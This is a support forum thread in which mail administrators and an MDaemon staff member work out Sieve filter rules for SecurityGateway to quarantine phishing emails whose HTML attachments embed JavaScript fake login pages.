Blocking Phishing attempts sent as html attachments with java script | MDaemon Technologies, Ltd.

Blocking Phishing attempts sent as html attachments with java script


  • We have received a number of attempts at phishing where the attachment was a larger html file and embedded into it is a javascript code block.

    The attachment consists of all of the images etc. required to display a fake login page with the users e-mail address pre-filled in and ready to submit the users e-mail address and password to a Base64 encoded URL.

    How would we go about creating a rule to block html attachments with a script block?

    We don't want to just block all html attachments as we don't see a way to report on how many html attachments we get that are legitimate.



  • would something like the following work?

     

    require ["mime", "foreverypart", "reject", "body"];

    foreverypart {
        if allof (
            header :mime :param "filename" :matches ["Content-Disposition", "Content-Type"] "*.html",
            body :content "text/html" :contains "<script"
        ) {
            reject "Email rejected due to HTML attachment containing JavaScript.";
            stop;
        }
    }


  • SecureGateway doesn't seem to support the 'mime' extension so the above doesn't work.


  • I was able to create a rule that I think may do what I want. Testing now.

     

    require ["securitygateway","fileinto","body"];
    if body :raw :contains ["<script", "</script>"]
    {
    fileinto "admin";
    stop;
    }


  • Shaun,

    Can you send me  (matt.mcdermott@mdaemon.com) a couple of example messages?


  • Hello Matt,

    I have sent you 2 examples just a minute ago.


  • Delivery has failed to these recipients:
    matt.mcdermott@mdaemon.com

    Subject: FW: Sheet ref-4928 For info@optrics.com only

    Remote Server returned: '550 Sorry, this message contains Phishing.HTML.Doc virus'

    🤣


  • If our MDaemon server detected it as a virus, I would expect for Securitygateway to as well.  I do not have access to our server at the moment, but I will have the admin review the logs.

    I would confirm that Ikarus AV is enabled.

    You can upload the message (.eml file) to https://mdaemon.sharefile.com/r-rc3922c1eed334d4dbf5e34f0bd04ccd6 and I will test with it.

    This script should accomplish what you are looking for.

    require ["securitygateway","fileinto","body", "regex"];
    if body :content ["text/html", "application/octet-stream"] :regex "(?s)<script>.*?</script>"
    {
    fileinto "admin";
    stop;
    }


  • Hello Matthew,

    I have uploaded 2 recent samples to sharefile and put this rule into testing.

    Ikarus AV is enabled and I see it is updating it's signatures and scanning messages.


Please login to reply this topic!